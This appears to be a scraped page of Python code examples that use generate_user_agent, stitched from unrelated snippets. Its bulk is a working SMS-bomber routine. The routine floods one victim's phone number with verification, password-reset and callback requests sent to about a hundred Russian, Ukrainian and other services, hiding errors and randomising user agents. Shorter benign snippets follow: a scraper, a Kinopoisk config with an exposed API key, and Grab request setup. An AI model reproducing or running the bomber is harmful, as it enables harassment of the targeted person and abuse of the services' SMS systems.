                     "action": "phone",
                     "phone": phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://tabasko.su/",
                 data={
                     "IS_AJAX": "Y",
                     "COMPONENT_NAME": "AUTH",
                     "ACTION": "GET_CODE",
                     "LOGIN": phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://www.sushi-profi.ru/api/order/order-call/",
                 json={
                     "phone": phone9,
                     "name": name
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://client-api.sushi-master.ru/api/v1/auth/init",
                 json={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "8(###)###-##-##")
            post(
                "https://xn--80aaispoxqe9b.xn--p1ai/user_account/ajax.php?do=sms_code",
                data={"phone": formatted_phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "8 (###) ###-##-##")
            post("http://sushigourmet.ru/auth",
                 data={
                     "phone": formatted_phone,
                     "stage": 1
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://sushifuji.ru/sms_send_ajax.php",
                 data={
                     "name": "false",
                     "phone": phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://api.sunlight.net/v3/customers/authorization/",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            get("https://suandshi.ru/mobile_api/register_mobile_user",
                params={"phone": phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "8-###-###-##-##")
            post("https://pizzasushiwok.ru/index.php",
                 data={
                     "mod_name": "registration",
                     "tpl": "restore_password",
                     "phone": formatted_phone
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://www.sportmaster.ua/",
                params={
                    "module": "users",
                    "action": "SendSMSReg",
                    "phone": phone
                },
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            get("https://www.sportmaster.ru/user/session/sendSmsCode.do",
                params={"phone": formatted_phone},
                headers=headers)
        except:
            pass
        try:
            post(
                "https://www.sms4b.ru/bitrix/components/sms4b/sms.demo/ajax.php",
                data={
                    "demo_number": "+" + phone,
                    "ajax_demo_send": "1"
                },
                headers=headers)
        except:
            pass
        try:
            post("https://smart.space/api/users/request_confirmation_code/",
                 json={
                     "mobile": "+" + phone,
                     "action": "confirm_mobile"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://shopandshow.ru/sms/password-request/",
                 data={
                     "phone": "+" + phone,
                     "resend": 0
                 },
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://shafa.ua/api/v3/graphiql",
                json={
                    "operationName":
                    "RegistrationSendSms",
                    "variables": {
                        "phoneNumber": "+" + phone
                    },
                    "query":
                    "mutation RegistrationSendSms($phoneNumber: String!) {\n  unauthorizedSendSms(phoneNumber: $phoneNumber) {\n    isSuccess\n    userToken\n    errors {\n      field\n      messages {\n        message\n        code\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n"
                },
                headers=headers)
        except:
            pass
        try:
            post(
                "https://shafa.ua/api/v3/graphiql",
                json={
                    "operationName":
                    "sendResetPasswordSms",
                    "variables": {
                        "phoneNumber": "+" + phone
                    },
                    "query":
                    "mutation sendResetPasswordSms($phoneNumber: String!) {\n  resetPasswordSendSms(phoneNumber: $phoneNumber) {\n    isSuccess\n    userToken\n    errors {\n      ...errorsData\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment errorsData on GraphResponseError {\n  field\n  messages {\n    code\n    message\n    __typename\n  }\n  __typename\n}\n"
                },
                headers=headers)
        except:
            pass
        try:
            post("https://sayoris.ru/?route=parse/whats",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.saurisushi.ru/Sauri/api/v2/auth/login",
                 data={
                     "data": {
                         "login": phone9,
                         "check": True,
                         "crypto": {
                             "captcha": "739699"
                         }
                     }
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://pass.rutube.ru/api/accounts/phone/send-password/",
                 json={"phone": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://rutaxi.ru/ajax_auth.html",
                 data={
                     "l": phone9,
                     "c": "3"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://rieltor.ua/api/users/register-sms/",
                 json={
                     "phone": phone,
                     "retry": 0
                 },
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://richfamily.ru/ajax/sms_activities/sms_validate_phone.php",
                data={"phone": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+#(###)###-##-##")
            post("https://www.rendez-vous.ru/ajax/SendPhoneConfirmationNew/",
                 data={
                     "phone": formatted_phone,
                     "alien": "0"
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://oapi.raiffeisen.ru/api/sms-auth/public/v1.0/phone/code",
                params={"number": phone},
                headers=headers)
        except:
            pass
        try:
            post("https://qlean.ru/clients-api/v2/sms_codes/auth/request_code",
                 json={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+#-###-###-##-##")
            post("https://api.pozichka.ua/v1/registration/send",
                 json={"RegisterSendForm": {
                     "phone": formatted_phone
                 }},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post(
                "https://pliskov.ru/Cube.MoneyRent.Orchard.RentRequest/PhoneConfirmation/SendCode",
                data={"phone": formatted_phone},
                headers=headers)
        except:
            pass
        try:
            get("https://cabinet.planetakino.ua/service/sms",
                params={"phone": phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "8-###-###-##-##")
            post("https://pizzasushiwok.ru/index.php",
                 data={
                     "mod_name": "call_me",
                     "task": "request_call",
                     "name": name,
                     "phone": formatted_phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://pizzasinizza.ru/api/phoneCode.php",
                 json={"phone": phone9},
                 headers=headers)
        except:
            pass
        try:
            post("https://pizzakazan.com/auth/ajax.php",
                 data={
                     "phone": "+" + phone,
                     "method": "sendCode"
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-####")
            post("https://pizza46.ru/ajaxGet.php",
                 data={"phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://piroginomerodin.ru/index.php?route=sms/login/sendreg",
                data={"telephone": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+#-###-###-##-##")
            post("https://paylate.ru/registry",
                 data={
                     "mobile": formatted_phone,
                     "first_name": name,
                     "last_name": name,
                     "nick_name": name,
                     "gender-client": 1,
                     "email": email,
                     "action": "registry"
                 },
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://www.panpizza.ru/index.php?route=account/customer/sendSMSCode",
                data={"telephone": "8" + phone9},
                headers=headers)
        except:
            pass
        try:
            post("https://www.ozon.ru/api/composer-api.bx/_action/fastEntry",
                 json={
                     "phone": phone,
                     "otpId": 0
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-####")
            post("https://www.osaka161.ru/local/tools/webstroy.webservice.php",
                 data={
                     "name": "Auth.SendPassword",
                     "params[0]": formatted_phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://ontaxi.com.ua/api/v2/web/client",
                 json={
                     "country": "UA",
                     "phone": phone[3:]
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://secure.online.ua/ajax/check_phone/",
                params={"reg_phone": phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "8 (###) ###-##-##")
            get("https://okeansushi.ru/includes/contact.php",
                params={
                    "call_mail": "1",
                    "ajax": "1",
                    "name": name,
                    "phone": formatted_phone,
                    "call_time": "1",
                    "pravila2": "on"
                },
                headers=headers)
        except:
            pass
        try:
            post(
                "https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone",
                data={"st.r.phone": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            post("https://nn-card.ru/api/1.0/covid/login",
                 json={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://www.nl.ua",
                 data={
                     "component": "bxmaker.authuserphone.login",
                     "sessid": "bf70db951f54b837748f69b75a61deb4",
                     "method": "sendCode",
                     "phone": phone,
                     "registration": "N"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://www.niyama.ru/ajax/sendSMS.php",
                 data={
                     "REGISTER[PERSONAL_PHONE]": phone,
                     "code": "",
                     "sendsms": "Выслать код"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://account.my.games/signup_send_sms/",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://auth.multiplex.ua/login",
                 json={"login": phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://prod.tvh.mts.ru/tvh-public-api-gateway/public/rest/general/send-code",
                params={"msisdn": phone},
                headers=headers)
        except:
            pass
        try:
            post("https://www.moyo.ua/identity/registration",
                 data={
                     "firstname": name,
                     "phone": phone,
                     "email": email
                 },
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://mos.pizza/bitrix/components/custom/callback/templates/.default/ajax.php",
                data={
                    "name": name,
                    "phone": phone
                },
                headers=headers)
        except:
            pass
        try:
            post("https://www.monobank.com.ua/api/mobapplink/send",
                 data={"phone": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://moneyman.ru/registration_api/actions/send-confirmation-code",
                data="+" + phone,
                headers=headers)
        except:
            pass
        try:
            post("https://my.modulbank.ru/api/v2/registration/nameAndPhone",
                 json={
                     "FirstName": name,
                     "CellPhone": phone,
                     "Package": "optimal"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://mobileplanet.ua/register",
                 data={
                     "klient_name": name,
                     "klient_phone": "+" + phone,
                     "klient_email": email
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://my.mistercash.ua/ru/send/sms/registration",
                params={"number": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            get("https://menza-cafe.ru/system/call_me.php",
                params={
                    "fio": name,
                    "phone": phone,
                    "phone_number": "1"
                },
                headers=headers)
        except:
            pass
        try:
            post(
                "https://www.menu.ua/kiev/delivery/registration/direct-registration.html",
                data={
                    "user_info[fullname]": name,
                    "user_info[phone]": phone,
                    "user_info[email]": email,
                    "user_info[password]": password,
                    "user_info[conf_password]": password
                },
                headers=headers)
        except:
            pass
        try:
            post("https://www.menu.ua/kiev/delivery/profile/show-verify.html",
                 data={
                     "phone": phone,
                     "do": "phone"
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# ### ### ## ##")
            get("https://makimaki.ru/system/callback.php",
                params={
                    "cb_fio": name,
                    "cb_phone": formatted_phone
                },
                headers=headers)
        except:
            pass
        try:
            post(
                "https://makarolls.ru/bitrix/components/aloe/aloe.user/login_new.php",
                data={
                    "data": phone,
                    "metod": "postreg"
                },
                headers=headers)
        except:
            pass
        try:
            post(
                "https://api-rest.logistictech.ru/api/v1.1/clients/request-code",
                json={"phone": phone},
                headers={
                    "Restaurant-chain": "c0ab3d88-fba8-47aa-b08d-c7598a3be0b9",
                    "User-Agent": generate_user_agent()
                })
        except:
            pass
        try:
            post("https://loany.com.ua/funct/ajax/registration/code",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://lenta.com/api/v1/authentication/requestValidationCode",
                json={"phone": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            post("https://koronapay.com/transfers/online/api/users/otps",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.kinoland.com.ua/api/v1/service/send-sms",
                 headers={
                     "Agent": "website",
                     "User-Agent": generate_user_agent()
                 },
                 json={
                     "Phone": phone,
                     "Type": 1
                 })
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "# (###) ###-##-##")
            post("https://kilovkusa.ru/ajax.php",
                 params={
                     "block": "auth",
                     "action": "send_register_sms_code",
                     "data_type": "json"
                 },
                 data={"phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms",
                json={"phone": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            post("https://kaspi.kz/util/send-app-link",
                 data={"address": phone9},
                 headers=headers)
        except:
            pass
        try:
            post("https://app.karusel.ru/api/v1/phone/",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://izi.ua/api/auth/register",
                 json={
                     "phone": "+" + phone,
                     "name": name,
                     "is_terms_accepted": True
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://izi.ua/api/auth/sms-login",
                 json={"phone": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.ivi.ru/mobileapi/user/register/phone/v6",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+## (###) ###-##-##")
            post("https://iqlab.com.ua/session/ajaxregister",
                 data={"cellphone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://www.ingos.ru/api/v1/lk/auth/register/fast/step2",
                 headers={
                     "Referer":
                     "https://www.ingos.ru/cabinet/registration/personal",
                     "User-Agent": generate_user_agent()
                 },
                 json={
                     "Birthday": "1986-07-10T07:19:56.276+02:00",
                     "DocIssueDate": "2004-02-05T07:19:56.276+02:00",
                     "DocNumber": randint(500000, 999999),
                     "DocSeries": randint(5000, 9999),
                     "FirstName": name,
                     "Gender": "M",
                     "LastName": name,
                     "SecondName": name,
                     "Phone": phone9,
                     "Email": email
                 })
        except:
            pass
        try:
            post("https://terra-1.indriverapp.com/api/authorization?locale=ru",
                 data={
                     "mode": "request",
                     "phone": "+" + phone,
                     "phone_permission": "unknown",
                     "stream_id": 0,
                     "v": 3,
                     "appversion": "3.20.6",
                     "osversion": "unknown",
                     "devicemodel": "unknown"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://api.imgur.com/account/v1/phones/verify",
                 json={
                     "phone_number": phone,
                     "region_code": "RU"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://www.icq.com/smsreg/requestPhoneValidation.php",
                 data={
                     "msisdn": phone,
                     "locale": "en",
                     "countryCode": "ru",
                     "version": "1",
                     "k": "ic1rtwz1s1Hj1O0r",
                     "r": "46763"
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://api.hmara.tv/stable/entrance",
                params={"contact": phone},
                headers=headers)
        except:
            pass
        try:
            post("https://helsi.me/api/healthy/accounts/login",
                 json={
                     "phone": phone,
                     "platform": "PISWeb"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://www.hatimaki.ru/register/",
                 data={
                     "REGISTER[LOGIN]": phone,
                     "REGISTER[PERSONAL_PHONE]": phone,
                     "REGISTER[SMS_CODE]": "",
                     "resend-sms": "1",
                     "REGISTER[EMAIL]": "",
                     "register_submit_button": "Зарегистрироваться"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://guru.taxi/api/v1/driver/session/verify",
                 json={"phone": {
                     "code": 1,
                     "number": phone9
                 }},
                 headers=headers)
        except:
            pass
        try:
            post("https://crm.getmancar.com.ua/api/veryfyaccount",
                 json={
                     "phone": "+" + phone,
                     "grant_type": "password",
                     "client_id": "gcarAppMob",
                     "client_secret": "SomeRandomCharsAndNumbersMobile"
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://foodband.ru/api?call=calls",
                 data={
                     "customerName": name,
                     "phone": formatted_phone,
                     "g-recaptcha-response": ""
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://foodband.ru/api/",
                params={
                    "call": "customers/sendVerificationCode",
                    "phone": phone9,
                    "g-recaptcha-response": ""
                },
                headers=headers)
        except:
            pass
        try:
            post("https://www.flipkart.com/api/5/user/otp/generate",
                 headers={
                     "Origin": "https://www.flipkart.com",
                     "User-Agent": generate_user_agent()
                 },
                 data={"loginId": "+" + phone})
        except:
            pass
        try:
            post("https://www.flipkart.com/api/6/user/signup/status",
                 headers={
                     "Origin": "https://www.flipkart.com",
                     "User-Agent": generate_user_agent()
                 },
                 json={
                     "loginId": "+" + phone,
                     "supportAllStates": True
                 })
        except:
            pass
        try:
            post("https://fix-price.ru/ajax/register_phone_code.php",
                 data={
                     "register_call": "Y",
                     "action": "getCode",
                     "phone": "+" + phone
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://findclone.ru/register",
                params={"phone": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            post("https://www.finam.ru/api/smslocker/sendcode",
                 data={"phone": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://2407.smartomato.ru/account/session",
                 json={
                     "phone": formatted_phone,
                     "g-recaptcha-response": None
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://www.etm.ru/cat/runprog.html",
                 data={
                     "m_phone": phone9,
                     "mode": "sendSms",
                     "syf_prog": "clients-services",
                     "getSysParam": "yes"
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://api.eldorado.ua/v1/sign/",
                params={
                    "login": phone,
                    "step": "phone-check",
                    "fb_id": "null",
                    "fb_token": "null",
                    "lang": "ru"
                },
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+## (###) ###-##-##")
            post("https://e-groshi.com/online/reg",
                 data={
                     "first_name": name,
                     "last_name": name,
                     "third_name": name,
                     "phone": formatted_phone,
                     "password": password,
                     "password2": password
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://vladimir.edostav.ru/site/CheckAuthLogin",
                 data={"phone_or_email": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.easypay.ua/api/auth/register",
                 json={
                     "phone": phone,
                     "password": password
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://my.dianet.com.ua/send_sms/",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.delitime.ru/api/v2/signup",
                 data={
                     "SignupForm[username]": phone,
                     "SignupForm[device_type]": 3
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://api.creditter.ru/confirm/sms/send",
                 json={
                     "phone": formatted_phone,
                     "type": "register"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://clients.cleversite.ru/callback/run.php",
                 data={
                     "siteid": "62731",
                     "num": phone,
                     "title": "Онлайн-консультант",
                     "referrer": "https://m.cleversite.ru/call"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://city24.ua/personalaccount/account/registration",
                 data={"PhoneNumber": phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                f"https://www.citilink.ru/registration/confirm/phone/+{phone}/",
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://cinema5.ru/api/phone_code",
                 data={"phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.cian.ru/sms/v1/send-validation-code/",
                 json={
                     "phone": "+" + phone,
                     "type": "authenticateCode"
                 },
                 headers=headers)
        except:
            pass
        try:
            # Fix: the payload kwarg was misspelled "son", which made
            # requests.post raise TypeError — swallowed by the bare
            # except, so this GraphQL call silently never happened.
            post(
                "https://api.carsmile.com/",
                json={
                    "operationName":
                    "enterPhone",
                    "variables": {
                        "phone": phone
                    },
                    "query":
                    "mutation enterPhone($phone: String!) {\n  enterPhone(phone: $phone)\n}\n"
                },
                headers=headers)
        except:
            pass
        try:
            get("https://it.buzzolls.ru:9995/api/v2/auth/register",
                params={"phoneNumber": "+" + phone},
                headers={
                    "keywordapi": "ProjectVApiKeyword",
                    "usedapiversion": "3",
                    "User-Agent": generate_user_agent()
                })
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "(###)###-##-##")
            post("https://bluefin.moscow/auth/register/",
                 data={
                     "phone": formatted_phone,
                     "sendphone": "Далее"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://app.benzuber.ru/login",
                 data={"phone": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://bartokyo.ru/ajax/login.php",
                 data={"user_phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://bamper.by/registration/?step=1",
                 data={
                     "phone": "+" + phone,
                     "submit": "Запросить смс подтверждения",
                     "rules": "on"
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "(###) ###-##-##")
            get("https://avtobzvon.ru/request/makeTestCall",
                params={"to": formatted_phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://oauth.av.ru/check-phone",
                 json={"phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://api-prime.anytime.global/api/v2/auth/sendVerificationCode",
                data={"phone": phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://apteka.ru/_action/auth/getForm/",
                 data={
                     "form[NAME]": "",
                     "form[PERSONAL_GENDER]": "",
                     "form[PERSONAL_BIRTHDAY]": "",
                     "form[EMAIL]": "",
                     "form[LOGIN]": formatted_phone,
                     "form[PASSWORD]": password,
                     "get-new-password": "******",
                     "user_agreement": "on",
                     "personal_data_agreement": "on",
                     "formType": "simple",
                     "utc_offset": "120"
                 },
                 headers=headers)
        except:
            pass
Beispiel #53
0
 def __init__(self):
     """Set up the handler: a fresh Session plus a random User-Agent header."""
     super(HttpHandler, self).__init__()
     agent = generate_user_agent()
     self.headers = {'User-Agent': agent}
     self.session = Session()
Beispiel #54
0
 def _getContentFromSite(self, link):
     """Fetch *link* and return the page parsed as a BeautifulSoup document.

     Bug fix: the original assigned headers to the *response* object
     after the request had already been made (a no-op), and used a set
     literal ``{"User-agent:", ...}`` instead of a dict.  The random
     User-Agent is now actually sent with the request.
     """
     headers = {"User-agent": generate_user_agent()}
     r = requests.get(link, headers=headers)
     # Decode with the configured encoding, replacing undecodable bytes.
     content = str(r.content, self.encoding, errors="replace")
     soup = BeautifulSoup(content, 'html.parser')
     return soup
Beispiel #55
0
for url in urllist:
	try:
		# searchinput=browser.find_element_by_css_selector('#kw')
		# searchinput.send_keys(msgstring)
		# searchinput.send_keys(Keys.DOWN)

		# Browser setup

		# cityname=''
		# ip_proxy=changeip(cityname)

		service_args = []
		dcap={}
		# Generate a random User-Agent string to disguise the browser
		uainfo=generate_user_agent()
		print(type(uainfo))
		print(uainfo)

		# dcap["phantomjs.page.settings.userAgent"] = (
		#   uainfo
		# )
		# dcap["phantomjs.page.settings.loadImages"] = False

		# # IP proxy
		# proxy = webdriver.Proxy()  
		# proxy.proxy_type = ProxyType.MANUAL  
		# proxy.http_proxy = ip_proxy
		# proxy.add_to_capabilities(dcap)  

		# browser = webdriver.PhantomJS(desired_capabilities=dcap,service_args=service_args)
		# NOTE(review): this excerpt is truncated — the matching except
		# clause for the try above is missing from the visible snippet.
Beispiel #56
0
 def default_header(self):
     """Return the default request headers for the chinawealth endpoint."""
     headers = {
         'Referer': 'https://www.chinawealth.com.cn/zzlc/jsp/lccp.jsp',
         'User-Agent': generate_user_agent(os=('mac', )),
         'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
     }
     return headers
Beispiel #57
0
    'ClientId': '55decdcf6d4cd1bcaa1b3856',
    'Accept': 'application/json',
    'device': 'android',
    'Android-Api-Version': '22',
    'X-API-KEY': '93fbd7a8-47d8-4c0d-a822-8615816c9536',
    'User-Agent': 'Android client (4.4 / api22),ru.kinopoisk/4.2.1 (52)'
}

# URL template for keyword search; %s slots are (keyword, page).
config['kinopoisk']['main'][
    'search'] = 'https://kinopoiskapiunofficial.tech/api/v2.1/films/search-by-keyword?keyword=%s&page=%s'
# Headers are a factory (lambda) so every call gets a fresh random User-Agent.
config['kinopoisk']['main']['headers'] = lambda: {
    'Referer': 'https://www.kinopoisk.ru',
    'Accept': 'text/html, application/xhtml+xml, image/jxr, */*',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.8,ru;q=0.7,uk;q=0.5,de-DE;q=0.3,de;q=0.2',
    'User-agent': generate_user_agent(),
    'X-Compress': 'null',
    'X-API-KEY': '93fbd7a8-47d8-4c0d-a822-8615816c9536',
    'Upgrade-Insecure-Requests': '1'
}

# Yandex suggest endpoint; %s is the partial query string.
config['kinopoisk']['main'][
    'yasearch'] = 'https://suggest-kinopoisk.yandex.net/suggest-kinopoisk?srv=kinopoisk&part=%s&nocookiesupport=yes'

# Image URL templates; %s placeholders are filled in by callers.
config['kinopoisk']['images'] = '%s'
config['kinopoisk']['imagesactor'] = 'https://st.kp.yandex.net/images/%s'
config['kinopoisk'][
    'actor'] = config.kinopoisk.imagesactor % 'actor_iphone/iphone360_%s.jpg'
config['kinopoisk'][
    'thumb'] = 'https://kinopoiskapiunofficial.tech/images/posters/kp_small/%s.jpg'
config['kinopoisk'][
Beispiel #58
0
def get_useragent():
    """Return a headers dict carrying a random mac/linux User-Agent string."""
    return {'User-Agent': generate_user_agent(os=('mac', 'linux'))}
Beispiel #59
0
    def process_config(self, grab):
        """Build a transport-level Request object from ``grab.config``.

        Translates the Grab configuration (url, method, timeouts, body
        storage, POST payload, proxy, user agent, headers, cookies)
        into ``self._request``.  Raises GrabInvalidUrl for a malformed
        URL and GrabMisuseError for inconsistent body/POST options.
        """
        req = Request(data=None)

        # Normalize the URL first; a failure here is a user error, so
        # wrap it into GrabInvalidUrl with the offending URL attached.
        try:
            request_url = normalize_url(grab.config['url'])
        except Exception as ex:
            raise error.GrabInvalidUrl(
                u'%s: %s' % (six.text_type(ex), grab.config['url']))
        req.url = request_url

        method = grab.detect_request_method()
        req.method = make_str(method)

        # 'nobody' means: do not read the response body at all.
        req.body_maxsize = grab.config['body_maxsize']
        if grab.config['nobody']:
            req.body_maxsize = 0

        req.timeout = grab.config['timeout']
        req.connect_timeout = grab.config['connect_timeout']

        extra_headers = {}

        # Body processing: keep the response body in memory, or stream
        # it into a file under body_storage_dir.
        if grab.config['body_inmemory']:
            pass
        else:
            if not grab.config['body_storage_dir']:
                raise GrabMisuseError(
                    'Option body_storage_dir is not defined')
            file_, path_ = self.setup_body_file(
                grab.config['body_storage_dir'],
                grab.config['body_storage_filename'],
                create_dir=grab.config['body_storage_create_dir'])
            req._response_file = file_
            req._response_path = path_

        # Request payload: multipart_post takes precedence over post.
        if grab.config['multipart_post'] is not None:
            post_data = grab.config['multipart_post']
            if isinstance(post_data, six.binary_type):
                # Raw bytes are sent as-is.
                pass
            elif isinstance(post_data, six.text_type):
                raise GrabMisuseError('Option multipart_post data'
                                      ' does not accept unicode.')
            else:
                # Sequence of (key, value) items -> multipart/form-data.
                post_items = normalize_http_values(
                    grab.config['multipart_post'],
                    charset=grab.config['charset'],
                    ignore_classes=(UploadFile, UploadContent),
                )
                #if six.PY3:
                post_items = decode_pairs(post_items,
                                          grab.config['charset'])
                post_items = process_upload_items(post_items)
                post_data, content_type = encode_multipart_formdata(post_items)
                extra_headers['Content-Type'] = content_type
            extra_headers['Content-Length'] = len(post_data)
            req.data = post_data
        elif grab.config['post'] is not None:
            post_data = normalize_post_data(grab.config['post'],
                                            grab.config['charset'])
            # py3 hack
            # if six.PY3:
            #    post_data = smart_unicode(post_data,
            #                              grab.config['charset'])
            extra_headers['Content-Length'] = len(post_data)
            req.data = post_data

        # A POST/PUT request must carry a body.
        if method in ('POST', 'PUT'):
            if (grab.config['post'] is None and
                grab.config['multipart_post'] is None):
                    raise GrabMisuseError('Neither `post` or `multipart_post`'
                                          ' options was specified for the %s'
                                          ' request' % method)
        # Proxy
        if grab.config['proxy']:
            req.proxy = grab.config['proxy']

        if grab.config['proxy_userpwd']:
            req.proxy_userpwd = grab.config['proxy_userpwd']

        if grab.config['proxy_type']:
            req.proxy_type = grab.config['proxy_type']
        else:
            req.proxy_type = 'http'

        # User-Agent: explicit option > random line from a file > generated.
        if grab.config['user_agent'] is None:
            if grab.config['user_agent_file'] is not None:
                with open(grab.config['user_agent_file']) as inf:
                    lines = inf.read().splitlines()
                grab.config['user_agent'] = random.choice(lines)
            else:
                grab.config['user_agent'] = generate_user_agent()

        extra_headers['User-Agent'] = grab.config['user_agent']


        # Headers: common_headers, then explicit headers, override the
        # computed extra_headers.
        headers = extra_headers
        headers.update(grab.config['common_headers'])

        if grab.config['headers']:
            headers.update(grab.config['headers'])
        req.headers = headers

        # Cookies
        self.process_cookie_options(grab, req)


        self._request = req
Beispiel #60
0
def run():
	ua = generate_user_agent()